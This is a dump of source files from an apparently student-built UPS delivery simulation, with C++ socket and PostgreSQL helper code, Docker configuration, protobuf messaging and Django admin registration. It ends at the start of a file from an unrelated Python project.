AF_UNSPEC;\n host_info.ai_socktype = SOCK_STREAM;\n\n status = getaddrinfo(host, port, &host_info, &host_info_list);\n if (status != 0) {\n cerr << \"Error: cannot get address info for host\" << endl;\n cerr << \" (\" << host << \",\" << port << \")\" << endl;\n // throw exception\n } \n\n socket_fd = socket(host_info_list->ai_family,\n\t\t host_info_list->ai_socktype,\n\t\t host_info_list->ai_protocol);\n if (socket_fd == -1) {\n cerr << \"Error: cannot create socket\" << endl;\n cerr << \" (\" << host << \",\" << port << \")\" << endl;\n // throw exception\n } \n\n status = connect(socket_fd, host_info_list->ai_addr, host_info_list->ai_addrlen);\n if (status == -1) {\n cerr << \"Error: cannot connect to socket\" << endl;\n cerr << \" (\" << host << \",\" << port << \")\" << endl;\n // throw excpetion\n } \n cout << \"Socket_fd int Conntector() \" << socket_fd << endl;\n freeaddrinfo(host_info_list);\n}\n\nConnector::Connector(Connector && rhs) noexcept {\n Socket(move(rhs));\n // port = exchange(rhs.port, nullptr);\n // host = exchange(rhs.host, nullptr);\n swap(port, rhs.port);\n swap(host, rhs.host);\n} \n \nConnector & Connector::operator=(Connector && rhs) noexcept {\n // cout << rhs.socket_fd << endl;\n if(this != &rhs) {\n Socket::operator=(move(rhs));\n swap(port, rhs.port);\n swap(host, rhs.host);\n }\n return * this;\n}\n\nConnector::~Connector() {}\n\n\n\n\n\n\n\n\t\t \n\n\n\n\n\t\t \n\t\t \n\n\t\t \n\n" }, { "alpha_fraction": 0.7786885499954224, "alphanum_fraction": 0.8032786846160889, "avg_line_length": 19.5, "blob_id": "9656cb13903e4230aaf3dbe944c279471d43060b", "content_id": "bcd7e1291774247121515d474383656d36b42a7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 122, "license_type": "no_license", "max_line_length": 36, "num_lines": 6, "path": "/Django-App/web-app/Dockerfile", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "FROM python:3\nENV PYTHONUNBUFFERED 1\nRUN mkdir /webapp\nCOPY . /webapp\nWORKDIR /webapp\nRUN pip3 install -r requirements.txt" }, { "alpha_fraction": 0.5313953757286072, "alphanum_fraction": 0.5779069662094116, "avg_line_length": 21, "blob_id": "ae35be4ad2da0bca30984a084a6b8c6026625852", "content_id": "7d0331c31884d7af0cddffef1c2281a92cbcf97f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "YAML", "length_bytes": 860, "license_type": "no_license", "max_line_length": 135, "num_lines": 39, "path": "/docker-compose.yml", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "version: \"2\"\n\nservices:\n db:\n image: postgres\n environment:\n POSTGRES_DB: ups_db\n POSTGRES_USER: postgres\n POSTGRES_PASSWORD: password\n volumes:\n - pgdata:/var/lib/postgresql/data\n front-end:\n build: ./Django-App/web-app\n command: bash -c \"python3 manage.py makemigrations upsApp && python3 manage.py migrate && python3 manage.py runserver 0.0.0.0:8000\"\n volumes:\n - \"./Django-App/web-app:/serverDir\"\n ports:\n - \"8000:8000\"\n depends_on:\n - db\n links:\n - db\n backend:\n build: ./Server-App/server\n command: bash -c \"make clean && make && ./server\" # backend\n volumes:\n - \"./Server-App/server:/serverDir\"\n depends_on:\n - front-end\n links:\n - db\n - front-end\n ports:\n - \"44444\"\n - \"44444:44444\"\n expose:\n - \"44444\"\nvolumes:\n pgdata: \n\n" }, { "alpha_fraction": 0.6009036302566528, "alphanum_fraction": 0.6033132672309875, "avg_line_length": 30.022430419921875, "blob_id": "2a7d315f74bb7960c1b5a166a8ee8236cbc22678", "content_id": "3e12a9c76a5b882db9b02046ad3cbad1455939fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 16600, "license_type": "no_license", "max_line_length": 526, "num_lines": 535, "path": "/Server-App/server/handle_requests.cpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#include \"handle_requests.hpp\"\n\n\nusing namespace std;\nusing namespace pqxx;\n\nmutex c_mutex;\n \nvoid get_parameter_based_on_dest(connection * C, vector< vector<string> > & my_vec){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n bool val = true;\n string sql = \"SELECT \\\"packageId\\\", \\\"xPosition\\\", \\\"yPosition\\\" FROM \\\"upsApp_package\\\" WHERE \\\"destRequiredUpdated\\\" = \" + W.quote(val) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res;\n int index = 0;\n\n for(res = R.begin(); res != R.end(); res++){\n if(res == R.end())\n break;\n my_vec[index].push_back(res[0].as<string>());\n my_vec[index].push_back(res[1].as<string>());\n my_vec[index].push_back(res[2].as<string>());\n string packageid = res[0].as<string>();\n string xposition = res[1].as<string>();\n string yposition = res[2].as<string>();\n \n bool update = false;\n sql = \"UPDATE \\\"upsApp_package\\\" SET \\\"destRequiredUpdated\\\" = \" + W.quote(update) + \" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \"AND \\\"xPosition\\\" = \" + W.quote(xposition) + \" AND \\\"yPosition\\\" = \" + W.quote(yposition) + \" ;\";\n W.exec(sql);\n index++;\n }\n\nmy_vec.resize(index);\nW.commit();\n\n}\n\n\n\nstring get_owner_id_from_username(connection * C, string username){\n // lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"SELECT id FROM auth_user WHERE username = \" + W.quote(username) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string owner_id = res[0].as<string>();\n return owner_id;\n}\n\n\n\n\nint max_sequence_num(connection * C){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"SELECT sequence_id FROM \\\"upsApp_sequence_number\\\" ORDER BY sequence_id DESC;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n if(res == R.end())\n return 0;\n else{\n\n int val = res[0].as<int>();\n return val;\n }\n\n\n}\n\nint max_package_num(connection * C){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"SELECT \\\"packageId\\\" FROM \\\"upsApp_package\\\" ORDER BY \\\"packageId\\\" DESC;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n if(res == R.end())\n return 0;\n else{\n\n int val = res[0].as<int>();\n return val;\n }\n\n\n}\n\n\nint max_order_id(connection * C){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"SELECT order_id FROM \\\"upsApp_order_table\\\" ORDER BY order_id DESC;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n if(res == R.end())\n return 0;\n else{\n\n int val = res[0].as<int>();\n return val;\n }\n\n}\n\n\n\n\nvoid drop_all_tables(connection * C){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"DROP TABLE IF EXISTS \\\"upsApp_sequence_number\\\", \\\"upsApp_order_table\\\", \\\"upsApp_current_world\\\", \\\"upsApp_truck\\\", \\\"upsApp_package\\\" ;\";\n W.exec(sql);\n W.commit();\n}\n\n\nvoid packed_packages(connection * C, vector<int> & package_vec, string whx_position, string why_position, string truck_id){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string packed = \"PD\";\n string sql = \"SELECT \\\"packageId\\\" FROM \\\"upsApp_package\\\" WHERE \\\"whxPosition\\\" = \" + W.quote(whx_position) + \" AND \\\"whyPosition\\\" = \" + W.quote(why_position) + \" AND status = \" + W.quote(packed) + \" AND \\\"truck_id\\\" = \" + W.quote(truck_id) + \" ORDER BY \\\"packageId\\\" ASC ;\";\n result R = W.exec(sql);\n for (result::const_iterator res = R.begin(); res != R.end(); res++){\n\n int packageid = res[0].as<int>();\n package_vec.push_back(packageid);\n \n } \n}\n\n\n\n\nbool packageExist(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"SELECT COUNT(*) FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n int num = res[0].as<int>();\n if(num == 0)\n return false;\n else\n return true;\n\n}\n \n\nbool isExist(connection * C, string username){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"SELECT COUNT(*) FROM auth_user WHERE username = \" + W.quote(username) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n int num = res[0].as<int>();\n if(num == 0)\n return false;\n else\n return true;\n }\n\n\nvoid insert_into_order_table(connection * C, string orderid, string package_num_id){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"INSERT INTO \\\"upsApp_order_table\\\"(order_id, package_num_id) VALUES ( \" + W.quote(orderid) + \" ,\" + W.quote(package_num_id) + \" );\";\n W.exec(sql);\n W.commit();\n\n}\n\nstring get_package_id_for_order(connection * C, string order_id){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT package_num_id FROM \\\"upsApp_order_table\\\" WHERE order_id = \" + W.quote(order_id) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string package = res[0].as<string>();\n return package;\n\n\n}\n\nstring get_order_id_for_package(connection * C, string package_id){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT order_id FROM \\\"upsApp_order_table\\\" WHERE package_num_id = \" + W.quote(package_id) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string order = res[0].as<string>();\n return order;\n}\n\n\n\nvoid update_location_of_package(connection * C, string x_position, string y_position, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);;\n string sql;\n sql = \"UPDATE \\\"upsApp_package\\\" SET \\\"xPosition\\\" = \" + W.quote(x_position) + \" , \\\"yPosition\\\" = \" + W.quote(y_position) + \" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n W.commit();\n\n}\n\n\n\nvoid update_truck_field_of_package(connection * C, string packageid, string value){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);;\n string sql;\n sql = \"UPDATE \\\"upsApp_package\\\" SET truck_id = \" + W.quote(value) + \" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n W.commit();\n}\n\nvoid update_acked_of_seqnum(connection * C, string seq, bool val){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);;\n string sql;\n sql = \"UPDATE \\\"upsApp_sequence_number\\\" SET ackedornot = \" + W.quote(val) + \" WHERE sequence_id = \" + W.quote(seq) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n W.commit();\n\n}\n\n\nbool get_seqnum_acked_or_not(connection * C, string seqnum){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);;\n string sql;\n sql = \"SELECT ackedornot FROM \\\"upsApp_sequence_number\\\" WHERE sequence_id = \" + W.quote(seqnum) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n bool result = res[0].as<bool>();\n return result;\n}\n\n\n\n\nstring get_truck_id_for_a_particular_package(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);;\n string sql;\n sql = \"SELECT truck_id FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string truck_id = res[0].as<string>();\n return truck_id;\n}\n\nstring get_xposition_of_a_package(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT \\\"xPosition\\\" FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string x_id = res[0].as<string>();\n return x_id;\n\n}\n\n\nstring get_yposition_of_a_package(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT \\\"yPosition\\\" FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string y_id = res[0].as<string>();\n return y_id;\n}\n\nstring get_package_status(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT status FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string status = res[0].as<string>();\n return status;\n}\n\nstring get_item_description(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT item FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string item = res[0].as<string>();\n return item;\n\n}\n\nstring get_warehouse_id_of_package(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT whid FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string wh_id = res[0].as<string>();\n return wh_id;\n}\n\nstring get_warehouse_xposition(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT \\\"whxPosition\\\" FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string x_id = res[0].as<string>();\n return x_id;\n}\n\n\nstring get_warehouse_yposition(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT \\\"whyPosition\\\" FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string y_id = res[0].as<string>();\n return y_id;\n\n}\n\n\nstring get_owner_id_of_package(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT owner_id FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string owner_id = res[0].as<string>();\n return owner_id;\n}\n\n\nstring get_truck_id_for_a_particular_status(connection * C, string status){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT \\\"truckId\\\" FROM \\\"upsApp_truck\\\" WHERE STATUS = \" + W.quote(status) + \" ORDER BY \\\"truckId\\\" ASC ;\";\n result R = W.exec(sql);\n string truck_id;\n result::const_iterator res = R.begin();\n if(res == R.end())\n return \"NULL\";\n else\n truck_id = res[0].as<string>();\n \n return truck_id;\n}\n\n\nstring get_username(connection *C , string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"SELECT owner_id FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string owner_id = res[0].as<string>();\n sql = \"SELECT username FROM auth_user WHERE id = \" + W.quote(owner_id) + \" ;\";\n R = W.exec(sql);\n res = R.begin();\n string username = res[0].as<string>();\n return username;\n}\n\n\n\nvoid insert_sequence_num(connection * C, string seq_num, string ackedornot){\n lock_guard<mutex> lock(c_mutex);\nwork W(*C);\nstring sql = \"INSERT INTO \\\"upsApp_sequence_number\\\"(sequence_id, ackedornot) VALUES (\" + W\\\n .quote(seq_num) + \" , \" + W.quote(ackedornot) + \");\";\nW.exec(sql);\nW.commit();\n}\n\n\nbool check_seq_num_exists(connection * C, string seq_num){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\nstring sql = \"SELECT * FROM \\\"upsApp_sequence_number\\\" WHERE sequence_id = \" + \\\nW.quote(seq_num) + \" ; \";\nresult R = W.exec(sql);\nresult::const_iterator res = R.begin();\n if(res == R.end())\n return false;\n else\n return true;\n}\n\n\n \n \n\nvoid update_package_destination(connection * C, string packageid, string new_x, string new_y){\n lock_guard<mutex> lock(c_mutex);\nstring sql;\nwork W(*C);\nsql = \"UPDATE \\\"upsApp_package\\\" SET \\\"xPosition\\\" = \" + W.quote(new_x) + \", \\\"yPosition\\\" = \" + W.quote(new_y) + \" WHERE \\\"packageId\\\" = \" +W.quote(packageid) + \" ;\";\nW.exec(sql);\nW.commit();\n}\n\nvoid update_package_warehouse_location_and_id(connection * C, string warehouse_id, string warehouse_x, string warehouse_y, string packageid){\n lock_guard<mutex> lock(c_mutex);\nstring sql;\nwork W(*C);\nsql = \"UPDATE \\\"upsApp_package\\\" SET WHID = \" + W.quote(warehouse_id) + \", \\\"whxPosition\\\" = \" + W.quote(warehouse_x) + \", \\\"whyPosition\\\" = \" + W.quote(warehouse_y) + \" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\nW.exec(sql);\nW.commit();\n}\n\n\nvoid insert_package(connection * C, string packageid, string username, string truck_id, string item, string status = \"DG\", string warehouse_id = \"0\", string warehouse_x = \"0\" , string warehouse_y = \"0\", string x_position = \"0\", string y_position = \"0\", string destination_update = \"False\"){\n lock_guard<mutex> lock(c_mutex);\n string owner_id;\n if (!username.empty()) {\n owner_id = get_owner_id_from_username(C, username);\n }\n string sql;\n \n work W(*C);\n if(!username.empty()){\n cout << \"empty()\" << endl;\n cout << \"owner_id in sql \" << owner_id << endl;\n string space = \" , \";\n sql = \"INSERT INTO \\\"upsApp_package\\\"(\\\"packageId\\\", owner_id, truck_id, status, item, whid, \\\"whxPosition\\\",\\\"whyPosition\\\", \\\"xPosition\\\", \\\"yPosition\\\", \\\"destRequiredUpdated\\\" ) VALUES(\" + W.quote(packageid) + \" , \" + W.quote(owner_id) + \" , \" + W.quote(truck_id) + \" , \" + W.quote(status) + \" , \" + W.quote(item) + \" , \" + W.quote(warehouse_id) + \" , \" + W.quote(warehouse_x) + \" , \" + W.quote(warehouse_y) + \" , \" + W.quote(x_position) + \" , \" + W.quote(y_position) + \" , \" + W.quote(destination_update) + \");\";\n cout << sql << endl;\n }\n else{\n sql = \"INSERT INTO \\\"upsApp_package\\\"(\\\"packageId\\\",truck_id, status, item, whid, \\\"whxPosition\\\",\\\"whyPosition\\\", \\\"xPosition\\\", \\\"yPosition\\\", \\\"destRequiredUpdated\\\" ) VALUES(\" + W.quote(packageid) + \" , \" + W.quote(truck_id) + \" , \" + W.quote(status) + \" , \" + W.quote(item) + \" , \" + W.quote(warehouse_id) + \" , \" + W.quote(warehouse_x) + \" , \" + W.quote(warehouse_y) + \" , \" + W.quote(x_position) + \" , \" + W.quote(y_position) + \" , \" + W.quote(destination_update) + \");\";\n }\n try{\n W.exec(sql);\n }\n catch (const std::exception &e) {\n cerr << e.what() << std::endl;\n return;\n }\n\n W.commit();\n}\n\n\nvoid update_status_of_package (connection * C, string packageid, string new_status){\n lock_guard<mutex> lock(c_mutex);\n string sql;\n work W(*C);\n sql = \"UPDATE \\\"upsApp_package\\\" SET STATUS = \" + W.quote(new_status) + \" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n W.exec(sql);\n W.commit();\n}\n\n\n//Complete truck related functions\nvoid insert_truck(connection * C, string truckid, string status){\n lock_guard<mutex> lock(c_mutex);\n string sql;\n work W(*C);\n sql = \"INSERT INTO \\\"upsApp_truck\\\"(\\\"truckId\\\",status) VALUES(\" + W.quote(truckid) + \" , \" + W.quote(status) + \");\";\n\n try{\n W.exec(sql);\n }\n catch (const std::exception &e) {\n cerr << e.what() << std::endl;\n return;\n }\n\n W.commit();\n}\n\n\nvoid update_truck_status(connection * C, string truck_id, string new_status){\n lock_guard<mutex> lock(c_mutex);\n string sql;\n work W(*C);\n sql = \"UPDATE \\\"upsApp_truck\\\" SET STATUS = \" + W.quote(new_status) + \" WHERE \\\"truckId\\\" = \" + W.quote(truck_id)+ \" ;\";\n W.exec(sql);\n W.commit();\n}\n\n string get_truck_status(connection * C, string truckid){\n lock_guard<mutex> lock(c_mutex);\n string sql;\n work W(*C);\n sql = \"SELECT STATUS FROM \\\"upsApp_truck\\\" WHERE \\\"truckId\\\" = \" + W.quote(truckid) + \" ; \";\n result R = W.exec(sql);\n string status;\n result::const_iterator res = R.begin();\n if(!(res == R.end()))\n status = res[0].as<string>();\n \n return status;\n\n}\n\n\n// void clear_all_tables(connection * C){\n\n// work W(*C);\n// string sql = \"TRUNCATE \\\"upsApp_sequence_number\\\", \\\"upsApp_order_table\\\", \\\"upsApp_current_world\\\", \\\"upsApp_truck\\\", \\\"upsApp_package\\\";\";\n// W.exec(sql);\n// W.commit();\n\n// }\n\n\nvoid clear_all_tables(connection * C){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"TRUNCATE \\\"upsApp_sequence_number\\\", \\\"upsApp_order_table\\\", \\\"upsApp_current_world\\\", \\\"upsApp_truck\\\", \\\"upsApp_package\\\", \\\"auth_user\\\" CASCADE;\";\n W.exec(sql);\n W.commit();\n\n}\n\n\n\n" }, { "alpha_fraction": 0.6894645094871521, "alphanum_fraction": 0.6987776756286621, "avg_line_length": 31.72381019592285, "blob_id": "36d70548ddc493946ad9fdaea3657e83ebc62b22", "content_id": "1561271e8c5451874775e79e56d4a9cbd0d3705f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3438, "license_type": "no_license", "max_line_length": 80, "num_lines": 105, "path": "/Server-App/server/amazonMsg.hpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#ifndef __AMAZONMSG__\n#define __AMAZONMSG__ \n\n#define LISTEN_PORT \"44444\"\n#define CONNECT_HOST \"vcm-5947.vm.duke.edu\"\n// #define CONNECT_HOST \"vcm-8273.vm.duke.edu\"\n#define CONNECT_PORT \"22222\"\n\n#include \"UA.pb.h\"\n#include \"socket.hpp\"\n#include <string.h>\n#include <cstdlib>\n#include <cstdio>\n#include <google/protobuf/message.h>\n#include <google/protobuf/descriptor.h>\n#include <google/protobuf/io/zero_copy_stream_impl.h>\n#include <google/protobuf/io/coded_stream.h>\n#include <google/protobuf/io/zero_copy_stream_impl_lite.h>\n\nusing namespace std;\n\nclass amazonMsg {\n static Connector connector;\n static amazonMsg * instance;\n static google::protobuf::io::FileOutputStream * out;\n static google::protobuf::io::FileInputStream * in;\n static Listener listener;\n static google::protobuf::io::FileOutputStream * listenerOut;\n static google::protobuf::io::FileInputStream * listenerIn;\n static mutex mtx_connector_in;\n static mutex mtx_connector_out;\n static mutex mtx_listener_in;\n static mutex mtx_listener_out;\n static Socket tempListener;\n // -------------------------\npublic:\n static amazonMsg * getInstance();\nprivate: \n amazonMsg() {} // Constructor? (the {} brackets) are needed here.\npublic:\n amazonMsg(amazonMsg const&) = delete;\n void operator=(amazonMsg const&) = delete;\n bool buildConnection(int worldid);\n void pickUpRes(int seqnum, int tracknum, int orderid, int truckid);\n void deliverRes(int seqnum, int tracknum);\n void sendError(string err, int originseqnum, int seqnum);\n void sendAck(int ack);\n void receiveRes(A2URequest& req); \n void acceptConnection();\n void updateDestination(int seqnum, int tracknum, int new_x, int new_y);\n void receiveDestUpdatedRes(A2UResponse & response);\n void sendAck22222(int ack);\n \n //this is adpated from code that a Google engineer posted online\n template<typename T> bool sendMesgTo(const T & message,\n\t\t google::protobuf::io::FileOutputStream *out) {\n \n { //extra scope: make output go away before out->Flush()\n // We create a new coded stream for each message.\n // Don’t worry, this is fast.\n google::protobuf::io::CodedOutputStream output(out);\n // Write the size.\n const int size = message.ByteSize();\n output.WriteVarint32(size);\n uint8_t* buffer = output.GetDirectBufferForNBytesAndAdvance(size);\n if (buffer != NULL) {\n\t// Optimization: The message fits in one buffer, so use the faster\n\t// direct-to-array serialization path.\n\tmessage.SerializeWithCachedSizesToArray(buffer);\n } else {\n\t// Slightly-slower path when the message is multiple buffers.\n\tmessage.SerializeWithCachedSizes(&output);\n\tif (output.HadError()) {\n\t return false;\n\t}\n }\n }\n out->Flush();\n return true;\n }\n\n //this is adpated from code that a Google engineer posted online\n template<typename T> bool recvMesgFrom(T & message,\n\t\t google::protobuf::io::FileInputStream * in ){\n google::protobuf::io::CodedInputStream input(in);\n uint32_t size;\n if (!input.ReadVarint32(&size)) {\n return false;\n }\n // Tell the stream not to read beyond that size.\n google::protobuf::io::CodedInputStream::Limit limit = input.PushLimit(size);\n // Parse the message.\n if (!message.MergeFromCodedStream(&input)) {\n return false;\n }\n if (!input.ConsumedEntireMessage()) {\n return false;\n }\n // Release the limit.\n input.PopLimit(limit);\n return true;\n }\n};\n \n#endif\n" }, { "alpha_fraction": 0.7948718070983887, "alphanum_fraction": 0.7948718070983887, "avg_line_length": 18.5, "blob_id": "fd013a823fdac79cfc326db647e9a94b2af9a41a", "content_id": "0cfea6f41e6ded1ab8f06343bff3718c7518c599", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 156, "license_type": "no_license", "max_line_length": 34, "num_lines": 8, "path": "/Django-App/web-app/upsApp/admin.py", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Package, Truck\n\n\n# Register your models here.\n\nadmin.site.register(Package)\nadmin.site.register(Truck)\n" }, { "alpha_fraction": 0.7882353067398071, "alphanum_fraction": 0.8117647171020508, "avg_line_length": 20.5, "blob_id": "6d3bd00c6e9ca905497a9915f5569b920dc5dac1", "content_id": "6d747f1bdcf40dea447c37f52f415c8d423edb08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 85, "license_type": "no_license", "max_line_length": 28, "num_lines": 4, "path": "/Server-App/server/Dockerfile", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "FROM jingru96/ups_server:ups\nRUN mkdir /serverDir\nWORKDIR /serverDir\nADD . /serverDir" } ]
23
MonuKumar0/scrapper
https://github.com/MonuKumar0/scrapper
3dd4dfca73fb91ec399eaf3f94480b556ecc82ae
b065caf76113de3ba4396874f6a5894ab631845c
21aa86e8adf10176cf7ab40d0caa4b7313341766
refs/heads/master
2021-09-03T00:10:18.817643
2018-01-04T07:29:02
2018-01-04T07:29:02
116,228,589
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5958747267723083, "alphanum_fraction": 0.6073338389396667, "avg_line_length": 27.9777774810791, "blob_id": "7b32618fe123ed158cc1174d405b69e579fcc2f2", "content_id": "75d04ab85ba796797f1ccd27b055d38994acb500", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1309, "license_type": "no_license", "max_line_length": 103, "num_lines": 45, "path": "/simpleapp.py", "repo_name": "MonuKumar0/scrapper", "src_encoding": "UTF-8", "text": "from flask import Flask\nimport sys \nimport optparse\nimport time\nimport json\nimport urllib\nfrom bs4 import BeautifulSoup\n\n\napp=Flask(__name__)\nstart=int(round(time.time()))\n\[email protected](\"/\")\ndef hello_world():\n url=\"https://www.codechef.com/contests\"\n page=urllib.request.urlopen(url)\n soup=BeautifulSoup(page,\"lxml\")\n mydivs=soup.find_all(\"table\",{\"class\" : \"dataTable\"})\n ln=len(mydivs)\n link=[]\n name=[]\n start=[]\n end=[]\n for i in range(0,(ln-1)):\n tbody=mydivs[i].find(\"tbody\")\n trs=tbody.findAll(\"tr\")\n ln2=len(trs)\n for j in range (0,ln2):\n tds=trs[j].findAll(\"td\")\n link.append(\"/\"+tds[0].string)\n name.append(tds[1].string)\n start.append(tds[2][\"data-starttime\"])\n end.append(tds[3][\"data-endtime\"]) \n contest={\"result\":[{\"link\":l,\"name\":n,\"start\":s,\"end\":e} for l,n,s,e in zip(link,name,start,end)]} \n return json.dumps(contest)\n\n\nif __name__=='__main__':\n parser=optparse.OptionParser(\"usage=simpleapp.py -p\")\n parser.add_option('-p','--port',action='store',dest='port',help='The port to listen on.')\n (args, _)=parser.parse_args()\n if args.port==None:\n print (\"Missing required arguments: -p/--port\")\n sys.exit(1)\n app.run(host='0.0.0.0',port=int(args.port),debug=False)\n \n" } ]
1
le-chartreux/dotstar
https://github.com/le-chartreux/dotstar
0e2d4572aecb2145b1381f728a6b57fe2c881818
3448d0053796955d75bfaae28ae702aff449841f
c1f423fbbdc78b22f05370a9bfa15d280d577d14
refs/heads/master
2023-05-06T00:11:14.656842
2021-05-24T13:03:37
2021-05-24T13:03:37
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5589473843574524, "alphanum_fraction": 0.5621052384376526, "avg_line_length": 35.53845977783203, "blob_id": "52638231f8594616d0e913620c83d04c73bf6ce0", "content_id": "96dbae754f5777df5965f77204281ae23d242b0b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2850, "license_type": "permissive", "max_line_length": 107, "num_lines": 78, "path": "/src/applications/application.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "from typing import Optional\nfrom colorama import Fore # for colors of the output\n\nimport ui\nfrom applications.package_manager import PackageManager\n\n\nclass Application:\n \"\"\"\n Class that describes entities of applications.json\n \"\"\"\n def __init__(\n self,\n name: str,\n description: str,\n comment: str,\n url: str,\n paid: bool,\n pms: dict[PackageManager, str]\n ) -> None:\n self.name = name\n self.description = description\n self.comment = comment\n self.url = url\n self.paid = paid\n self.pms = pms\n\n def print_informations(self) -> None:\n \"\"\"\n Print all the informations about the app.\n \"\"\"\n ui.print_description(\"Application name: \" + self.name)\n ui.print_description(\"Description: \" + self.description)\n ui.print_description(\"Comment: \" + self.comment)\n ui.print_description(\"URL: \" + self.url)\n ui.print_description(\"Paid: \" + (\"yes\" if self.paid else \"no\"))\n\n # print all the possibles pm inline\n supported_pm = \"\"\n for possible_pm in 